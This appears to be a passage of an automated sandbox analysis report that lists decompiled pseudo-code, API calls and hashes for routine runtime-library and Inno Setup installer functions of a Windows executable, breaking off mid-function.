                                                            • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                            • API String ID: 4275029093-79381301
                                                            • Opcode ID: 60cbd49ddd200d6d95d4e054eb85e0ada012a2fb0b751d352b1ba5f8ec496b5f
                                                            • Instruction ID: 8f5f9a4eb212fab3c4852abc810e80ead921d34dcce11bc4c58bc7a6251dba94
                                                            • Opcode Fuzzy Hash: 60cbd49ddd200d6d95d4e054eb85e0ada012a2fb0b751d352b1ba5f8ec496b5f
                                                            • Instruction Fuzzy Hash: 52116371D00208BEDB20EFA5D84576EBBA8EB40705F1184BBF815F32C1D67D9A908B1D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 43%
                                                            			E004076B8(void* __ecx) {
                                                            				long _v4;
                                                            				void* _t3;
                                                            				void* _t9;
                                                            
                                                            				if( *0x4bb058 == 0) {
                                                            					if( *0x4b7032 == 0) {
                                                            						_push(0);
                                                            						_push("Error");
                                                            						_push("Runtime error     at 00000000");
                                                            						_push(0);
                                                            						L00403780();
                                                            					}
                                                            					return _t3;
                                                            				} else {
                                                            					if( *0x4bb344 == 0xd7b2 &&  *0x4bb34c > 0) {
                                                            						 *0x4bb35c();
                                                            					}
                                                            					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1d,  &_v4, 0);
                                                            					_t9 = E00408240(0x40774c);
                                                            					return WriteFile(GetStdHandle(0xfffffff5), _t9, 2,  &_v4, 0);
                                                            				}
                                                            			}







                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
                                                            • GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
                                                            • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: FileHandleWrite
                                                            • String ID: Error$Runtime error at 00000000
                                                            • API String ID: 3320372497-2970929446
                                                            • Opcode ID: 06894f85802f1aca0c877f66b17294aabd6ee15dfccdef8be12070d3d0c4ead6
                                                            • Instruction ID: db14fa18f2a627875cbdcf208ba1e0af1765c14dc112cf76e17f9611cef7a876
                                                            • Opcode Fuzzy Hash: 06894f85802f1aca0c877f66b17294aabd6ee15dfccdef8be12070d3d0c4ead6
                                                            • Instruction Fuzzy Hash: DFF0C2A1A8C24079FA2077A94C47F5A269C8740B16F108A3FF610B61D1C7FD6584937E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00420524(void* __ebx, void* __esi) {
                                                            				intOrPtr _t4;
                                                            				intOrPtr _t6;
                                                            
                                                            				if(E0041FF68(6, 0) == 0) {
                                                            					_t4 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"NTDLL.DLL"), L"RtlCompareUnicodeString");
                                                            					 *0x4be914 = _t4;
                                                            					 *0x4be910 = E00420428;
                                                            					return _t4;
                                                            				} else {
                                                            					_t6 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"CompareStringOrdinal");
                                                            					 *0x4be910 = _t6;
                                                            					return _t6;
                                                            				}
                                                            			}






                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,CompareStringOrdinal,004B5A2E,00000000,004B5A41), ref: 0042053E
                                                              • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                            • GetModuleHandleW.KERNEL32(NTDLL.DLL,RtlCompareUnicodeString,004B5A2E,00000000,004B5A41), ref: 00420559
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: HandleModule$AddressProc
                                                            • String ID: CompareStringOrdinal$NTDLL.DLL$RtlCompareUnicodeString$kernel32.dll
                                                            • API String ID: 1883125708-3870080525
                                                            • Opcode ID: b7bf267469631706014ef5b6a976724c1e29590bd579973413919bb6c8384525
                                                            • Instruction ID: 4ba185d4141586243d2650af69d43cb091b5da9faf927984522c9bbe9ad7037f
                                                            • Opcode Fuzzy Hash: b7bf267469631706014ef5b6a976724c1e29590bd579973413919bb6c8384525
                                                            • Instruction Fuzzy Hash: 04E08CF0B4232036E644FB672C0769929C51B85709BD04A3F7004BA1D7DBBE42659E2E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 77%
                                                            			E0042931C(short* __eax, intOrPtr __ecx, signed short* __edx) {
                                                            				char _v260;
                                                            				char _v768;
                                                            				char _v772;
                                                            				short* _v776;
                                                            				intOrPtr _v780;
                                                            				char _v784;
                                                            				signed int _v788;
                                                            				signed short* _v792;
                                                            				char _v796;
                                                            				char _v800;
                                                            				intOrPtr* _v804;
                                                            				signed short* _v808;
                                                            				void* __ebp;
                                                            				signed char _t55;
                                                            				signed int _t64;
                                                            				void* _t72;
                                                            				intOrPtr* _t83;
                                                            				void* _t103;
                                                            				void* _t105;
                                                            				void* _t108;
                                                            				void* _t109;
                                                            				intOrPtr* _t118;
                                                            				void* _t122;
                                                            				intOrPtr _t123;
                                                            				char* _t124;
                                                            				void* _t125;
                                                            
                                                            				_t110 = __ecx;
                                                            				_v780 = __ecx;
                                                            				_v808 = __edx;
                                                            				_v776 = __eax;
                                                            				if((_v808[0] & 0x00000020) == 0) {
                                                            					E00428FDC(0x80070057);
                                                            				}
                                                            				_t55 =  *_v808 & 0x0000ffff;
                                                            				if((_t55 & 0x00000fff) != 0xc) {
                                                            					_push(_v808);
                                                            					_push(_v776);
                                                            					L00427254();
                                                            					return E00428FDC(_v776);
                                                            				} else {
                                                            					if((_t55 & 0x00000040) == 0) {
                                                            						_v792 = _v808[4];
                                                            					} else {
                                                            						_v792 =  *(_v808[4]);
                                                            					}
                                                            					_v788 =  *_v792 & 0x0000ffff;
                                                            					_t103 = _v788 - 1;
                                                            					if(_t103 < 0) {
                                                            						L9:
                                                            						_push( &_v772);
                                                            						_t64 = _v788;
                                                            						_push(_t64);
                                                            						_push(0xc);
                                                            						L00427828();
                                                            						_t123 = _t64;
                                                            						if(_t123 == 0) {
                                                            							E00428D34(_t110);
                                                            						}
                                                            						E00429278(_v776);
                                                            						 *_v776 = 0x200c;
                                                            						 *((intOrPtr*)(_v776 + 8)) = _t123;
                                                            						_t105 = _v788 - 1;
                                                            						if(_t105 < 0) {
                                                            							L14:
                                                            							_t107 = _v788 - 1;
                                                            							if(E00429294(_v788 - 1, _t125) != 0) {
                                                            								L00427840();
                                                            								E00428FDC(_v792);
                                                            								L00427840();
                                                            								E00428FDC( &_v260);
                                                            								_v780(_t123,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
                                                            							}
                                                            							_t72 = E004292C4(_t107, _t125);
                                                            						} else {
                                                            							_t108 = _t105 + 1;
                                                            							_t83 =  &_v768;
                                                            							_t118 =  &_v260;
                                                            							do {
                                                            								 *_t118 =  *_t83;
                                                            								_t118 = _t118 + 4;
                                                            								_t83 = _t83 + 8;
                                                            								_t108 = _t108 - 1;
                                                            							} while (_t108 != 0);
                                                            							do {
                                                            								goto L14;
                                                            							} while (_t72 != 0);
                                                            							return _t72;
                                                            						}
                                                            					} else {
                                                            						_t109 = _t103 + 1;
                                                            						_t122 = 0;
                                                            						_t124 =  &_v772;
                                                            						do {
                                                            							_v804 = _t124;
                                                            							_push(_v804 + 4);
                                                            							_t23 = _t122 + 1; // 0x1
                                                            							_push(_v792);
                                                            							L00427830();
                                                            							E00428FDC(_v792);
                                                            							_push( &_v784);
                                                            							_t26 = _t122 + 1; // 0x1
                                                            							_push(_v792);
                                                            							L00427838();
                                                            							E00428FDC(_v792);
                                                            							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
                                                            							_t122 = _t122 + 1;
                                                            							_t124 = _t124 + 8;
                                                            							_t109 = _t109 - 1;
                                                            						} while (_t109 != 0);
                                                            						goto L9;
                                                            					}
                                                            				}
                                                            			}






























                                                            APIs
                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004293D1
                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004293ED
                                                            • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00429426
                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004294A3
                                                            • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004294BC
                                                            • VariantCopy.OLEAUT32(?,?), ref: 004294F7
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                            • String ID:
                                                            • API String ID: 351091851-0
                                                            • Opcode ID: 098dc979d013d57468a629589b458cb88fc05e19e5f0a5a7df6b54d31b1502c0
                                                            • Instruction ID: 2fed5c09d90993a71d142947efe00684c7910c2ed580f9cb9a97fb5731140b2d
                                                            • Opcode Fuzzy Hash: 098dc979d013d57468a629589b458cb88fc05e19e5f0a5a7df6b54d31b1502c0
                                                            • Instruction Fuzzy Hash: 4B51EE75A012299FCB21DB59D981BDAB3FCAF0C304F8041DAF548E7211D634AF858F65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 34%
                                                            			E004AFA44(void* __eax, void* __ebx, void* __edi, void* __esi) {
                                                            				char _v8;
                                                            				char _v12;
                                                            				void* _t24;
                                                            				intOrPtr _t28;
                                                            				void* _t31;
                                                            				void* _t32;
                                                            				intOrPtr _t35;
                                                            
                                                            				_t32 = __esi;
                                                            				_t31 = __edi;
                                                            				_push(0);
                                                            				_push(0);
                                                            				_t24 = __eax;
                                                            				_push(_t35);
                                                            				_push(0x4aface);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t35;
                                                            				if(( *0x4c1d61 & 0x00000001) == 0) {
                                                            					E00407A20( &_v8);
                                                            				} else {
                                                            					E00407E48( &_v8, L"/ALLUSERS\r\nInstructs Setup to install in administrative install mode.\r\n/CURRENTUSER\r\nInstructs Setup to install in non administrative install mode.\r\n");
                                                            				}
                                                            				_push(L"The Setup program accepts optional command line parameters.\r\n\r\n/HELP, /?\r\nShows this information.\r\n/SP-\r\nDisables the This will install... Do you wish to continue? prompt at the beginning of Setup.\r\n/SILENT, /VERYSILENT\r\nInstructs Setup to be silent or very silent.\r\n/SUPPRESSMSGBOXES\r\nInstructs Setup to suppress message boxes.\r\n/LOG\r\nCauses Setup to create a log file in the user\'s TEMP directory.\r\n/LOG=\"filename\"\r\nSame as /LOG, except it allows you to specify a fixed path/filename to use for the log file.\r\n/NOCANCEL\r\nPrevents the user from cancelling during the installation process.\r\n/NORESTART\r\nPrevents Setup from restarting the system following a successful installation, or after a Preparing to Install failure that requests a restart.\r\n/RESTARTEXITCODE=exit code\r\nSpecifies a custom exit code that Setup is to return when the system needs to be restarted.\r\n/CLOSEAPPLICATIONS\r\nInstructs Setup to close applications using files that need to be updated.\r\n/NOCLOSEAPPLICATIONS\r\nPrevents Setup from closing applications using files that need to be updated.\r\n/FORCECLOSEAPPLICATIONS\r\nInstructs Setup to force close when closing applications.\r\n/FORCENOCLOSEAPPLICATIONS\r\nPrevents Setup from force closing when closing applications.\r\n/LOGCLOSEAPPLICATIONS\r\nInstructs Setup to create extra logging when closing applications for debugging purposes.\r\n/RESTARTAPPLICATIONS\r\nInstructs Setup to restart applications.\r\n/NORESTARTAPPLICATIONS\r\nPrevents Setup from restarting applications.\r\n/LOADINF=\"filename\"\r\nInstructs Setup to load the settings from the specified file after having checked the command line.\r\n/SAVEINF=\"filename\"\r\nInstructs Setup to save installation settings to the specified file.\r\n/LANG=language\r\nSpecifies the internal name of the language to use.\r\n/DIR=\"x:\\dirname\"\r\nOverrides the default directory name.\r\n/GROUP=\"folder name\"\r\nOverrides the default folder name.\r\n/NOICONS\r\nInstructs Setup to initially check the Don\'t create a Start Menu folder check box.\r\n/TYPE=type name\r\nOverrides the default setup type.\r\n/COMPONENTS=\"comma separated list of component names\"\r\nOverrides the default component settings.\r\n/TASKS=\"comma separated list of task names\"\r\nSpecifies a list of tasks that should be initially selected.\r\n/MERGETASKS=\"comma separated list of task names\"\r\nLike the /TASKS parameter, except the specified tasks will be merged with the set of tasks that would have otherwise been selected by default.\r\n/PASSWORD=password\r\nSpecifies the password to use.\r\n");
                                                            				_push(_v8);
                                                            				_push(_t24);
                                                            				_push(0x4b0f94);
                                                            				_push(L"For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline");
                                                            				E004087C4( &_v12, _t24, 5, _t31, _t32);
                                                            				MessageBoxW(0, E004084EC(_v12), L"Setup", 0x10);
                                                            				_pop(_t28);
                                                            				 *[fs:eax] = _t28;
                                                            				_push(E004AFAD5);
                                                            				return E00407A80( &_v12, 2);
                                                            			}











                                                            APIs
                                                            • MessageBoxW.USER32(00000000,00000000,Setup,00000010), ref: 004AFAAE
                                                            Strings
                                                            • Setup, xrefs: 004AFA9E
                                                            • The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will in, xrefs: 004AFA7C
                                                            • /ALLUSERSInstructs Setup to install in administrative install mode./CURRENTUSERInstructs Setup to install in non administrat, xrefs: 004AFA68
                                                            • For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline, xrefs: 004AFA8A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID: /ALLUSERSInstructs Setup to install in administrative install mode./CURRENTUSERInstructs Setup to install in non administrat$For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline$Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will in
                                                            • API String ID: 2030045667-3391638011
                                                            • Opcode ID: 66245cf56300a1c7c541050b9d52e7f7cee767bf73c9c42da64b4bca2bf40a85
                                                            • Instruction ID: 307a18092975e57fce7d36cb0845ad1ef4e0a75d88e156d2955b45763d379f25
                                                            • Opcode Fuzzy Hash: 66245cf56300a1c7c541050b9d52e7f7cee767bf73c9c42da64b4bca2bf40a85
                                                            • Instruction Fuzzy Hash: D701A230748308BBE711E7D1CD52FDEB6A8D74AB04FA0047BB904B25D1D6BC6A09852D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 69%
                                                            			E0042F9B8(signed short* __eax, signed int __ecx, signed short* __edx, void* __edi, void* __fp0) {
                                                            				signed int _v8;
                                                            				signed char _v9;
                                                            				signed int _v12;
                                                            				signed int _v14;
                                                            				void* _v20;
                                                            				void* _v24;
                                                            				signed short* _v28;
                                                            				signed short* _v32;
                                                            				signed int _v48;
                                                            				void* __ebx;
                                                            				void* __ebp;
                                                            				signed int _t150;
                                                            				signed int _t272;
                                                            				intOrPtr _t328;
                                                            				intOrPtr _t331;
                                                            				intOrPtr _t339;
                                                            				intOrPtr _t347;
                                                            				intOrPtr _t355;
                                                            				void* _t360;
                                                            				void* _t362;
                                                            				intOrPtr _t363;
                                                            
                                                            				_t367 = __fp0;
                                                            				_t358 = __edi;
                                                            				_t360 = _t362;
                                                            				_t363 = _t362 + 0xffffffd4;
                                                            				_v8 = __ecx;
                                                            				_v32 = __edx;
                                                            				_v28 = __eax;
                                                            				_v9 = 1;
                                                            				_t272 =  *_v28 & 0x0000ffff;
                                                            				if((_t272 & 0x00000fff) >= 0x10f) {
                                                            					_t150 =  *_v32 & 0x0000ffff;
                                                            					if(_t150 != 0) {
                                                            						if(_t150 != 1) {
                                                            							if(E00430860(_t272,  &_v20) != 0) {
                                                            								_push( &_v14);
                                                            								_t273 =  *_v20;
                                                            								if( *((intOrPtr*)( *_v20 + 8))() == 0) {
                                                            									_t275 =  *_v32 & 0x0000ffff;
                                                            									if(( *_v32 & 0xfff) >= 0x10f) {
                                                            										if(E00430860(_t275,  &_v24) != 0) {
                                                            											_push( &_v12);
                                                            											_t276 =  *_v24;
                                                            											if( *((intOrPtr*)( *_v24 + 4))() == 0) {
                                                            												E00428BF0(0xb);
                                                            												goto L41;
                                                            											} else {
                                                            												if(( *_v28 & 0x0000ffff) == _v12) {
                                                            													_t143 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
                                                            													_v9 =  *(0x4b93d2 + _v8 * 2 + _t143) & 0x000000ff;
                                                            													goto L41;
                                                            												} else {
                                                            													_push( &_v48);
                                                            													L00427244();
                                                            													_push(_t360);
                                                            													_push(0x42fdb0);
                                                            													_push( *[fs:eax]);
                                                            													 *[fs:eax] = _t363;
                                                            													_t289 = _v12 & 0x0000ffff;
                                                            													E004299A4( &_v48, _t276, _v12 & 0x0000ffff, _v28, __edi, __fp0);
                                                            													if((_v48 & 0x0000ffff) != _v12) {
                                                            														E00428AF8(_t289);
                                                            													}
                                                            													_t131 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
                                                            													_v9 =  *(0x4b93d2 + _v8 * 2 + _t131) & 0x000000ff;
                                                            													_pop(_t328);
                                                            													 *[fs:eax] = _t328;
                                                            													_push(0x42fde5);
                                                            													return E00429278( &_v48);
                                                            												}
                                                            											}
                                                            										} else {
                                                            											E00428BF0(0xb);
                                                            											goto L41;
                                                            										}
                                                            									} else {
                                                            										_push( &_v48);
                                                            										L00427244();
                                                            										_push(_t360);
                                                            										_push(0x42fcf7);
                                                            										_push( *[fs:eax]);
                                                            										 *[fs:eax] = _t363;
                                                            										_t294 =  *_v32 & 0x0000ffff;
                                                            										E004299A4( &_v48, _t275,  *_v32 & 0x0000ffff, _v28, __edi, __fp0);
                                                            										if(( *_v32 & 0x0000ffff) != _v48) {
                                                            											E00428AF8(_t294);
                                                            										}
                                                            										_v9 = E0042F7D0( &_v48, _v8, _v32, _t358, _t360, _t367);
                                                            										_pop(_t331);
                                                            										 *[fs:eax] = _t331;
                                                            										_push(0x42fde5);
                                                            										return E00429278( &_v48);
                                                            									}
                                                            								} else {
                                                            									if(( *_v32 & 0x0000ffff) == _v14) {
                                                            										_t95 = ( *((intOrPtr*)( *_v20 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
                                                            										_v9 =  *(0x4b93d2 + _v8 * 2 + _t95) & 0x000000ff;
                                                            										goto L41;
                                                            									} else {
                                                            										_push( &_v48);
                                                            										L00427244();
                                                            										_push(_t360);
                                                            										_push(0x42fc52);
                                                            										_push( *[fs:eax]);
                                                            										 *[fs:eax] = _t363;
                                                            										_t299 = _v14 & 0x0000ffff;
                                                            										E004299A4( &_v48, _t273, _v14 & 0x0000ffff, _v32, __edi, __fp0);
                                                            										if((_v48 & 0x0000ffff) != _v14) {
                                                            											E00428AF8(_t299);
                                                            										}
                                                            										_t83 = ( *((intOrPtr*)( *_v20 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
                                                            										_v9 =  *(0x4b93d2 + _v8 * 2 + _t83) & 0x000000ff;
                                                            										_pop(_t339);
                                                            										 *[fs:eax] = _t339;
                                                            										_push(0x42fde5);
                                                            										return E00429278( &_v48);
                                                            									}
                                                            								}
                                                            							} else {
                                                            								E00428BF0(__ecx);
                                                            								goto L41;
                                                            							}
                                                            						} else {
                                                            							_v9 = E0042F550(_v8, 2);
                                                            							goto L41;
                                                            						}
                                                            					} else {
                                                            						_v9 = E0042F53C(0, 1);
                                                            						goto L41;
                                                            					}
                                                            				} else {
                                                            					if(_t272 != 0) {
                                                            						if(_t272 != 1) {
                                                            							if(E00430860( *_v32 & 0x0000ffff,  &_v24) != 0) {
                                                            								_push( &_v12);
                                                            								_t282 =  *_v24;
                                                            								if( *((intOrPtr*)( *_v24 + 4))() == 0) {
                                                            									_push( &_v48);
                                                            									L00427244();
                                                            									_push(_t360);
                                                            									_push(0x42fb63);
                                                            									_push( *[fs:eax]);
                                                            									 *[fs:eax] = _t363;
                                                            									_t306 =  *_v28 & 0x0000ffff;
                                                            									E004299A4( &_v48, _t282,  *_v28 & 0x0000ffff, _v32, __edi, __fp0);
                                                            									if((_v48 & 0xfff) !=  *_v28) {
                                                            										E00428AF8(_t306);
                                                            									}
                                                            									_v9 = E0042F7D0(_v28, _v8,  &_v48, _t358, _t360, _t367);
                                                            									_pop(_t347);
                                                            									 *[fs:eax] = _t347;
                                                            									_push(0x42fde5);
                                                            									return E00429278( &_v48);
                                                            								} else {
                                                            									if(( *_v28 & 0x0000ffff) == _v12) {
                                                            										_t44 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
                                                            										_v9 =  *(0x4b93d2 + _v8 * 2 + _t44) & 0x000000ff;
                                                            										goto L41;
                                                            									} else {
                                                            										_push( &_v48);
                                                            										L00427244();
                                                            										_push(_t360);
                                                            										_push(0x42facc);
                                                            										_push( *[fs:eax]);
                                                            										 *[fs:eax] = _t363;
                                                            										_t311 = _v12 & 0x0000ffff;
                                                            										E004299A4( &_v48, _t282, _v12 & 0x0000ffff, _v28, __edi, __fp0);
                                                            										if((_v48 & 0xfff) != _v12) {
                                                            											E00428AF8(_t311);
                                                            										}
                                                            										_t32 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
                                                            										_v9 =  *(0x4b93d2 + _v8 * 2 + _t32) & 0x000000ff;
                                                            										_pop(_t355);
                                                            										 *[fs:eax] = _t355;
                                                            										_push(0x42fde5);
                                                            										return E00429278( &_v48);
                                                            									}
                                                            								}
                                                            							} else {
                                                            								E00428BF0(__ecx);
                                                            								goto L41;
                                                            							}
                                                            						} else {
                                                            							_v9 = E0042F550(_v8, 0);
                                                            							goto L41;
                                                            						}
                                                            					} else {
                                                            						_v9 = E0042F53C(1, 0);
                                                            						L41:
                                                            						return _v9 & 0x000000ff;
                                                            					}
                                                            				}
                                                            			}

























                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c6922fb93c990c72bf9a49bf3daa94017bfe3b7264ddd93f55e738123a9900a9
                                                            • Instruction ID: 1b6310f250808118d38827de8a535e3b6e70e535f73b2508e71121fbf0c58563
                                                            • Opcode Fuzzy Hash: c6922fb93c990c72bf9a49bf3daa94017bfe3b7264ddd93f55e738123a9900a9
                                                            • Instruction Fuzzy Hash: 41D19D75E0011A9FCB00EFA9D4919FEB7B5EF48300BD080B6E801A7245D638AD4ADB69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 75%
                                                            			E0041C790(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
                                                            				char _v8;
                                                            				short _v18;
                                                            				short _v22;
                                                            				struct _SYSTEMTIME _v24;
                                                            				short _v536;
                                                            				short* _t32;
                                                            				intOrPtr* _t47;
                                                            				intOrPtr _t56;
                                                            				void* _t61;
                                                            				intOrPtr _t63;
                                                            				void* _t67;
                                                            
                                                            				_v8 = 0;
                                                            				_t47 = __edx;
                                                            				_t61 = __eax;
                                                            				_push(_t67);
                                                            				_push(0x41c873);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t67 + 0xfffffdec;
                                                            				E00407A20(__edx);
                                                            				_v24 =  *(_a4 - 2) & 0x0000ffff;
                                                            				_v22 =  *(_a4 - 4) & 0x0000ffff;
                                                            				_v18 =  *(_a4 - 6) & 0x0000ffff;
                                                            				if(_t61 > 2) {
                                                            					E00407E48( &_v8, L"yyyy");
                                                            				} else {
                                                            					E00407E48( &_v8, 0x41c88c);
                                                            				}
                                                            				_t32 = E004084EC(_v8);
                                                            				if(GetDateFormatW(GetThreadLocale(), 4,  &_v24, _t32,  &_v536, 0x200) != 0) {
                                                            					E0040858C(_t47, 0x100,  &_v536);
                                                            					if(_t61 == 1 &&  *((short*)( *_t47)) == 0x30) {
                                                            						_t63 =  *_t47;
                                                            						if(_t63 != 0) {
                                                            							_t63 =  *((intOrPtr*)(_t63 - 4));
                                                            						}
                                                            						E004088AC( *_t47, _t63 - 1, 2, _t47);
                                                            					}
                                                            				}
                                                            				_pop(_t56);
                                                            				 *[fs:eax] = _t56;
                                                            				_push(0x41c87a);
                                                            				return E00407A20( &_v8);
                                                            			}















                                                            APIs
                                                            • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000200,00000000,0041C873), ref: 0041C816
                                                            • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000200,00000000,0041C873), ref: 0041C81C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: DateFormatLocaleThread
                                                            • String ID: $yyyy
                                                            • API String ID: 3303714858-404527807
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 85%
                                                            			E0041EEFC(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* _a4) {
                                                            				intOrPtr _v8;
                                                            				intOrPtr _v12;
                                                            				char _v534;
                                                            				short _v1056;
                                                            				short _v1568;
                                                            				struct _MEMORY_BASIC_INFORMATION _v1596;
                                                            				char _v1600;
                                                            				intOrPtr _v1604;
                                                            				char _v1608;
                                                            				intOrPtr _v1612;
                                                            				char _v1616;
                                                            				intOrPtr _v1620;
                                                            				char _v1624;
                                                            				char* _v1628;
                                                            				char _v1632;
                                                            				char _v1636;
                                                            				char _v1640;
                                                            				intOrPtr _t55;
                                                            				signed int _t76;
                                                            				void* _t82;
                                                            				intOrPtr _t83;
                                                            				intOrPtr _t95;
                                                            				intOrPtr _t98;
                                                            				intOrPtr _t100;
                                                            				intOrPtr* _t102;
                                                            				void* _t105;
                                                            
                                                            				_v1640 = 0;
                                                            				_v8 = __ecx;
                                                            				_t82 = __edx;
                                                            				_t102 = __eax;
                                                            				_push(_t105);
                                                            				_push(0x41f0a8);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t105 + 0xfffff99c;
                                                            				VirtualQuery(__edx,  &_v1596, 0x1c);
                                                            				if(_v1596.State != 0x1000 || GetModuleFileNameW(_v1596.AllocationBase,  &_v1056, 0x105) == 0) {
                                                            					GetModuleFileNameW( *0x4be634,  &_v1056, 0x105);
                                                            					_v12 = E0041EEF0(_t82);
                                                            				} else {
